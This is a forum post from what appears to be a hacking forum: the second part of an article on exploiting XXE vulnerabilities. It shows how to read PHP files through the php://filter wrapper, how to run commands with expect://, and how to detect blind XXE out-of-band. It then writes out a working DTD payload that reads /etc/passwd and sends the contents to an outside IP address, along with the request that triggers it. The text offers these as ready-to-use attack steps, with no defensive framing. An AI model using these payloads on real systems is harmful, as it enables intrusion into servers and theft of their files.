Article: XXE Vulnerabilities. №2
by OstapBender - Friday December 15, 2023 at 04:36 PM
#1
Continued Article: PHP Vulnerabilities.
Reading PHP files
If we need to read a php file, we will have to act a bit differently here. Since the php code will have a lot of spaces, tags, line breaks and other nonsense, we will not be able to read it the way we did above. For example, the file index.php.
[Image: 1700411278143-png.72241]
So let's use Wrapper php://
php://filter/read=convert.base64-encode/resource=index.php
Here we convert the contents of the file to base64 and then decode it safely: 
[Image: 1700412088068-png.72242]
[Image: 1700412179527-png.72243]
Execution of remote commands is performed using Wrapper expect://
As shown on the screenshot, the id command was successfully executed.
[Image: 1700412268124-png.72244]
Out-of-band
There are situations when XXE is present, but we do not get any response. Suppose in our example there is no response from the server, but we guess that the vulnerability is present. This could indicate that a blind XXE is present.
Here is an example of how Out-of-band can be used to detect blind XXE attacks.
Suppose an attacker sends an XML file containing an external entity's link to a URL it controls, as follows:
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY title SYSTEM "http://sfbhb2v1sgdmwmk60lr6rilt9kfa3z.oastify.com">]>
<title>&title;</title>
When the modified request is sent to the server, the server will start knocking on our Collaborator, and as a result we will get a bounce that there was a request, so the XXE attack worked:
[Image: 1700412447768-png.72245]
The requests passed, so XXE worked
Let's try to read the file. Create a file xxe.dtd where we enter the following code
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; getdata SYSTEM 'http://109.252.167.95:1234/?x=%file;'>">
%eval;
%getdata;
And in the query, this load
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://109.252.167.95/xxe.dtd"> %xxe;]>
[Image: 1700412580478-png.72246]
As you can see, we read the file. Well, that's pretty much it.
Thank you all for your attention. See you again!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Article: No. 2 Methods of obtaining a Reverse shell OstapBender 0 685 12-16-2023, 08:34 PM
Last Post: OstapBender
  Article: No. 1 Methods of obtaining a Reverse shell OstapBender 0 667 12-16-2023, 08:09 PM
Last Post: OstapBender
  Article: №3 Automating the exploitation of blind Time-based SQL injection using Burp OstapBender 0 656 12-16-2023, 07:04 PM
Last Post: OstapBender
  Article: №2 Automating the exploitation of blind Time-based SQL injection using Burp OstapBender 0 638 12-16-2023, 06:33 PM
Last Post: OstapBender
  Article: Automating the exploitation of blind Time-based SQL injection using Burp Sui OstapBender 0 621 12-16-2023, 06:09 PM
Last Post: OstapBender



 Users browsing this thread: 2 Guest(s)